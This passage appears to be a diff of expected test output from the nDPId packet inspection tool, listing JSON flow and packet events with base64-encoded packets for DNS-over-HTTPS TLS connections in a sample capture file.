CtcaZ0Stuv2mMWKbTn30OOZzAWiYjVeWw1PNj6IPMesZYC3bO1PwS8+BOlQEPumskRErqRklUuVJ1OXsXJn8o9P7B9r5RxumsKPZbrYuGjTJfVUwTIwaAH4g\/GODGK2+B5YB\/Z\/6LysjXxF0obthFSDlDUGBTCdDZdGFQyyl8u0xri2sr4xv5TWFpIjmyYys6SXqhW7QRXi8cM\/fGE\/JM+qZpyddar8bHdCLxGlvvPz4eCxh6lg0sugzb6K+mUo6W7gtEoQaKMIAakeMy2FOKQ3NMe5\/F+3b43gHog099YK8NKs2bvSG\/W7LXyo8PnUinj+AVLnzhrSe+qvDBw9a\/Jp7AkHbVoQwt\/EIF5\/d5w+4KMlJPMSzCUov8rfi\/CCF\/iVjvModtxk+gLz4pUaK3XRZHYtLxfH7FHcLizTZ3sSU4i+tweqvPEyxXE1E7Y+KMLDCV+QkbWkWi9gMec8ZJ3GBnIg+iSrehGCt8i8t7Lu9Wc\/2fGKgQfE9jJe\/fDA2odknuy5GV2960tQvEZAXB0c5GJBhjiPYJgYdgJ2fzUt\/xLgBoWg0zKHa\/soHWqBrLympLp+VepVMyzuzIJ6QgGVTCC1EFSrrSUxkNXDsBrwmyRP\/9FLF9pdzZACXTb6S8myrZazmvEdGdk04PjNhUiHGlUT03OYvmagf8Ya\/4VRzGGdV43OAGkQYeu0ZY\/heh9h7fucuCFB8CyBx4wy7OhYHBnDOYz2gdf\/z49N039rzJarMWXOwbROgeoXzcsBH8Uj6StZMCbM\/ZBGWByfEjHDl5w8E1dbyJx5XuC65RezHZrv05dJlBbVSEsHIMbDl7IWOUdhpeDNskZrQ+GdU5boLCtHmvrbs62KT\/zlJm2mOApHTvifRvmqKBz9tPtGNCG6XGCZWhEY3FFyS9rmcTpceJwTCfQYlzYKZslhMKd4J63ankp0RnGQLgodwM35ISK98+Kq2hNOJCTBOCxPPsHuXjZuhXdIi8QCW9VQZqww\/\/NjZPMOPy4jcZ7Tkixh7\/JmbpMEV7PnrhAXh21z+u5dLFH52pKdwGRat6A94UDcInit5rOcJtblnF8P7F8IlQqF3WFZurZBuXzllHTzbwe54UUGPwrqwyOIUkW6zUYU\/09YfhXdyYwY1MnGRAlrE9sPr4V9Vgn7ZntvhQgmKz\/jiHNHuRGaj\/PJAjEPTmoQib9SfYaA5fyYDQmsautNL\/cJ4oyfD9Jembyctib1BIp9Ramfe6PSsBXI\/0Ka52Or"} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739298533,"flow_last_seen":946739298797,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739298797,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739298533,"flow_last_seen":946739298797,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739298797,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
02292{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946739298797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAVy1TFAACsGSuyLY95ICgAAAQG70arq+8YweX\/bslAYAfkcrQAAThemFBuD34j0ZojpR7nDk08tEILyrSrE7HS0zZ4kmhXJJxPvCajO9mPz0f1Ba7CUeJZuC\/ww3Lrn+zD28CW1o9VT3LiWNj\/tk7IhVjR3oxyzXVyp8GIUKoCq+rFgLmVNv3t4E9NSsp0vzaP0F7j0JBrlPSojRxE2tlZsJ5feSSYzKGVucsWX6pYRquGlpuPfdHODx0L8ifTKNZ7sMGSXufTYU71W7zucIJWTJn92oiP3KQmXtYYb39SlVhRkoPmox0CcWIbUIkPk1mOfiZj7ZHZGdjmSkO+stoE+mAIy1qeh6xhTg7nyjAGvTt0OEbSBbL64py0gHtL8p9MnYDH\/rEu94PzROteC\/nq08LwZZof+0aydUgoyNJpYIzziL6obgZ8r3XFfT2yBZeGRYlK+7j980Fzg4IJlxXjB\/7u4t3CFM2KzwkVTOl0QgQ2WdVMZr63UzYIuBqVeqhjDwph8EAIPfj6GHii36awX1ARUIn+i2we8pqEICyjrrtz5abqrvBqhOgUymt9799jpjN96PN89rSa+qz8R5hSWva8Z0q12NMSUqK4V32q2T+XbFuVZUlGqNPo8Q4LGFZXuYD0rXuNudeUYIvyeE2j5uqdZqZHCJg4amyAZz0RTts0c1\/NYqX2y5hPaOLvInAlZn4kgRx8P3JUIFzzVPNJJ35uuAChT5mattKXxu8qwume7sBZMgcO4xIk9V0GeDf7Q0iqbxG1cZybv7JIhiCiaIbji819I0oDOejGbK2XffVEsRj3+LURpVM8fUmFAk669Ff\/Nr+yt6tH9Ktz6qOevm0rhgviDIUwzLNJNTxk3pvt9wNVus\/LUfcLiMKspToabUtDV2KtFlgjUQBZ6M603sQeMbcyD6v4zye6TReEZisbYDNmcge+IFl+e+6gIZYcwnBnjL+IMuKODuiRDaCLQJS72LiQoTClqyWNhk8p3nZX4LJsLVi6dW6cV7ErhFynQJtxWGrvo9DrmvbJGRV80Ul449jTrc22WvgTBKnaXTTsv2pw69IL3ziatAlwA6VUKivZyuSnP\/qeqQsLIM3h1xsud7x+raSQILbisV46QaEMOKNMhEo4f9EE5vYtzwm\/ngKP6CEyyxa5eOnqoj72FpXRNgDKcpbuNQSddL+rkopq\/y8uRR5TATut5xq9zEjEQLnRu3bhaqmLH7wPAre5tejGNaBElH9ZorCCzrnrfL+5ZFV65djnMn\/burxQW9SIIOlDcRe3ddZxIf\/z8dXGWfc\/YJ2alVKWABNBLcFPeFubCnDOGFnp7WaEezUQCo1huX1d\/AR2t9ZFIxb+\/2YA0Fcu4FFOucBmHB64h34YnG1QktWj0QN6yNlW1E24ubX3xPextdjh4av9ufsqLyV+lQC34GqCFKa3D2btbNVuYlf3F\/nsdPHHCRn+svJvZKssoO39MnIg20E8\/NZSYgAW7+dMxM2JbTCDpQf718V5e42Tcc3D\/MVuwLpSLFUnGgbahF3PvczhUvo5QFk5tF0YRiH+1QJX+P4
Bld+SLzREBNKhff3\/yg9uJJKca+U+6nBcDAwCBaMxAcfS4h68NX8O4\/JsJCa+QWF87yNO9r0+szCZ1TeWGW\/KMvQNFzX1G+Y2PEnQ68hI4LpJQIC4VjBdW13rCggF8QR46NY3HL4enM7oteZTlqkQvxVphVmRyDsYFcjY4u2fGUw5LFrsQktQhx2VsQTygsXipX2KtdmPdscHLlgGRFwMDADV5C7WBlZ+ocDTA\/zppOjhaktsCXwO0sG+1hu0Zi0K+GaWwxXTJGdG0p2vdDlGf4dOI0eNxTQ=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946739299058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739299058,"pkt":"REREREREZmZmZmZmCABFAAFDIvZAAL0Gb1YKAAABi2PeSNGsAbu+7R6jIfk4pVAYAfYrngAAFgMBARYBAAESAwOSQ8JxHhGuu6wLKnGtwDfaCU9fn2zkXyLvCqG6Z1EJrSA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBvduxHcveHyzSwUHe1UMoR3WO30Q1YJASO6Gqd5f5rOQ=="} 
-00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
02367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946739299325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAWq+oRAACsGJWGLY95ICgAAAQG70awh+Tilvu0fvlAQAflBFAAAFgMDAHoCAAB2AwO4E1L4A\/\/vaa3qFy7zGtkSllYVpFARFReL8E9wQ5edfiA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62BMBAAAuACsAAgMEADMAJAAdACC6hi7aKoaulrg0kHVy9iX3JtIXsjOWFqMY4JtXoR3ZFBQDAwABARcDAwAkVn7ui3VtyEjBPho8csX4cWU91LDHlldd37yMDuMkm1WrNSA\/FwMDCVkNxERPpxFp1hU3MTygH94nI+uO3MFA6Pgc7Cjgsqv9R94L1LzqnlTJ9qM2GdC3DoaCFMZy2rvnd3TUb44js1wH\/ZjR\/tueYjuCchsydXsjOJIItHXpv6rNdoQc5GxilmSN3ZLV0BdssW6zhxxgQaE3FYajxWXTTfgzUzOS+6W++jmvd1q00zg+8Q0qSguzfNUtyikLzjXqF591w71tmw1RwueDWDRqOR8D9ArOOASC\/gfHKocbf3MYoPn\/L3+LeyjDo7Dan2mPuEUKlItjagedNzassvjfnCKDfWzjTYX1Oj074zzZKYUi326SCBVqvZ4BTAJFklyVRE2\/7w5a9Hu3TkucSU4uD6YDgHvYuwr1PUeuJlpLcTtMIe6KqdQO6VhykmmEfKtsuoqKDau0V16KSQWM2aCvsVesKQ3DSQJg5rL5yIwj9vpyWnaHxDEgfEIDmYjy\/Axgsm7vfVWFF3Jrfc1xzCpgVx2Wzxxl\/maZOzNTYwZUTU3hLDZjHHXTyifvb45snBjXrLw3E9kNt6T2lmZ7d2lzBq35OqiFyiqDdqg5nN+wvKg6FFTseFXwn\/Cnava4JqwJeCYBLZwtvjbxpmY\/Z7bzc6mZPg2Sh+dbDSkCl3bi0C7OGN4lTKk6SakWyrfvl60M9dBFHVDrzgKu7xbDvPEvSNcZq2Dx1QXy2oMyLZnD977uZ9nLe2MaP79hLJNgy4v+jriXtA5fuVRTABndd0eLGpCNoQRcyQEasclWVE0X3djEYjD5W2s+8ID+COBoWOoyP\/WAq9bDmdFuLbZL5YcQMg6OEX37+6VcGXh24mzLjiWqRW2SXZBECP5e9Kp+qBc4nsLJy+\/cCFFzWnnOIeDNkPzITjeYYG62LLpDcjihxenHjNkU8aI6W9z7HJRAKXj15JybI7ZavgKdsyBJSz8Rv17E9WgwJgE24FqtNa6LcXPjCIVJ4JA\/FRIvlJbq2\/PV2grzaPllz7EIQXESn4AAbsSK6v\/afg1rifhsSGv2yYjxwtRB5P9D+FT0dFjO2m9zDYEYLvFPNAv2\/uEF0d+ML9zrDfaDdz6z+wzZI7tOXb+ZgoELySqXWnZpXCKfAbAaRdkBWG9n\/7DEkPQfGc3BRuxecF3gZRN5TjRNnS3L\/z3Mjd0kgq5NvuPBzwr++r8PkzDyv4SrhrEho0ZXiTGQlO7AUNavDHJ2E6WcvB6wH6w+nDu+LafkJwVBrA3g2ry2AgWQYQlCtuH3p4tS5epl0vy3sOsnzjbAIulHq4VIitq5pO3s+sczN2
QL3hoGMgZmvfNYCCppei2sMRM3JeTXdDamDavAss5ffhc7o9sFzFOhYwBHF3K+RDvF+\/0hY+kvloFXPT7w5qyKb029c\/+Vu3kK8iCqQMpkd\/Y7fPVoDJRSebia6NkOtp0QF10Wqdh2s0768F9ux8l3ns6Ahcvm\/CEcnhylTvqF1H8nFLoIPnLNfkqliriwfEB7qB8aB8psWMvXozj1u+xw79vKaBVDClx5kPg1ndY1UZCkXuVmLOZwvxWWc0tuTJcMVug1lNwCPKGUEoQ6IRWLIe8NCbqmkI6bW\/5Xu20soyB9iTbKgsh2xLBekpYgVl8gT8VGJflOjydyD64I9+T\/dXz5zy\/0oPQP9q2vSa5j"} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739299058,"flow_last_seen":946739299325,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739299325,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739299058,"flow_last_seen":946739299325,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739299325,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946739299325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1406,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1406,"pkt_l4_len":1372,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAVw+oVAACsGJZqLY95ICgAAAQG70awh+T4nvu0fvlAYAfmmIAAAiW51QuqEfobYElojzNdmal3NmvuNd\/aotOFuZKIcd+01MY62EHH7E56\/oxK0qr9J58d7Jfc491vr3AkBsKJZSE5EN1LMlpXioNrse464nnbj5nYCt1y8iJtaYVHfHT9x8ujbG\/T2N6ZekRm+ONP3O7xw3rubgw7ubQJF\/KHEiRVFPrbIwq5RI7VTRdfrd3b9Fc\/71kitl8ImBckYsh09FSa2nRQrqALNG43BNA+FPS+D4bALfGJGztFq32s2D2cWRj2vno7VjQQWYQsz+9R40cUHWMbbW0anf7aLopYHYwhAUnxfUJyLSGv\/hcuY1JoGSes4gPPm0w\/KvSPUfmH1XOcuJRdoXdElY5F\/m9je9IUq8euoPyf0PXU\/w6wn+q9PJNYNblwNWPVkVSF6bp87Ycrz+bZvhmrk3ipYYu58\/qf3ItMXsHiYNDHVbyhTOrrT84X2uXkA5ajgilxkHZCWJdDIvRFwT++59P5vI4krRFU0SPX1eygQdMslXLsxvfqQATVp3sK76bt8qHa8rMRVLCfPA3UPe8Z9q\/JNBVvEPCwFBWQICqqCApD7kqMSclaEy89K83LVugXlNfNOargw6YlUR36QNrsco2xSkkpbYZSag+guZDt8NaBOAQqx6Dtx5yS9ZeM2TaZ4Tva3cH5WwTw3nwMfyBrZkmKclliFlyL+l3\/Ft\/1cAhtU5U7a4LgYVbdqsQxRVbeUPAwUZ68y2BGyj5Xg8Mtci4mPsgh+bnyNL5K5y9jSltRS79PDJA87B7hqXTRUrELkxjFWaMPAzghsENt\/UjelVjAgSWUxzpqxPV+2hED3HVp9LJOBmZIcSEVN1eWHazkX+mtW2m+0GAsZaxamutLzgJh\/DRJa7Jw23fjV9PCXnj9MWSdJstPENtBI0OVh7PH0+uAGt1zxMdGzUgBU2QlNOO7S4UuYD0Y26DtfRFNsa3yyMMJMA4d1B+99D0rLBp+YTr6CIQlSGW7\/MY0mGzKXnXLKEBMjIoE76aJQADNrOQ1pUsHUbMNYSxpurIgJZbgBG3OALLoptMECW3PsCTpgXkQ2OmVE11D882PmbdA0f4acC7LQATIGoxF7ZIVK6E9Vi5\/LR0AueJFdtzLq+oc1+GpS8l4A7KvQzJjHl8BFVtlJFp5Ft91g8c86AHAIukg5AmfSwO3K4Rq0SXUs8KcP29aiI1bA7\/K0iAEMbAiDcRNwXEEo+uNEfshUZQDIyZoBHdLzMTL\
/2s9ouLF90mtZTkbub4ko0oHCp0UBuhgnfDbrA69yTnP91yV8UR8xswBSaiV12vmMHeXGGKIJ6dQbgPNn5OzZbyefQz5\/sH6dHxYbcGGfd+8wSxfEi7DokbKnmTmetH85RkCusy06sJkhFgf9bhlEmk63Cet5cz7Z7ea9PrtiS\/xOPZoAmLR8AcrBNB\/tHpNVlFcTM+gO6pHXXYSwt1o+rdQxZT4lFn7kVxmARBzEGQB8TIogOkRi0YtdMrX\/cAGbQWx0wllwfDL\/JIISbxKwUNTT45zepGk3OVcnv0694KsAM6Pujlm7XvrZ+hcDAwB\/JlZfTL2CfKHweE8ivDA\/8Dj4s9MhpgBrmwa3P4sMMqXQFKgI6jQB7iGhbQGftnSVKI+QCxWleTjngiVWQbRq4xwswRPPuCr\/EteohSIpdjvjIjT4EQlykWjN3TxUSVyvVSA8Rp0nUkHXzRzNgRwt1EKIchjIYekan95L5wPtZxcDAwA1P8zjtyfqh9OaAN1qf+msLEHbyvTYhKC4e6LNeICCaSA3aHIsCQ1pZdcK52vQiTVTlBfFsLw="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946739304432,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":352,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":352,"pkt_l4_len":318,"thread_ts_msec":946739304432,"pkt":"REREREREZmZmZmZmCABFAAFSUVZAAL0GFwkKAAABuV\/aKsW2AbtqjRCaK20m8FAYAfZViwAAFgMBASUBAAEhAwPqrEqAFBwbSYnmd5FQ4vhXWCXQOM7WSA+ydz5Uq2T7jCDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACyAAAAIQAfAAAcZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDBZSA439npt9wjB\/Qij4hgUYqoHU3i8\/GsiDYDjRoMEQ=="} -00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946739304474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAAuA8Y9AADUG9KG5X9oqCgAAAQG7xbYrbSbwao0RxFAQAfVfuQAAFgMDAHoCAAB2AwMcSuw\/xeEh9B9zohSBYXmLCSdYelc0PZguMzAQLdc5lyDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25xMCAAAuACsAAgMEADMAJAAdACA9LiT1RQf61DUAcNgmrd9PJwh2JRIEeJ2AayVwYZe0VRQDAwABARcDAwAkpkFL6pYrY48v\/7oiAzlOAXfNYnXJT5\/VQ9ye3Jhdgfb\/qFcIFwMDDINDI+OvHUF+FRNUcqHGAtixa5OM3ESWY04brG7N5Xjztm8RaH\/MawsGpkLkwKimhVGQ6ciJhhX175QbHhfhLL45mnkevxxrQGot9ty+fzwVg7GUUCbrsUr32l6TD4OY9EXQQSyuoBvDePneEphgFWs2uB\/zEFQxJzZvf194T3VRrMXZftbpf\/YmEhwWBzhFxCXz7FBI47mE4BFAjuyUMEWUzwiwE55sybcBJQIrcz91caVnRcYmA1Wi1qK5uHVbVaqkF1jIcRZS6+N+xmFq9MBtbs1TttpF6z36PG19i1g1CIx8xl4wpaYvqDA7QOoSL5x3PMqBtb0k4c3Q\/zEwDdawR+TYy7hNCaHkQ1sAWum3cmhR
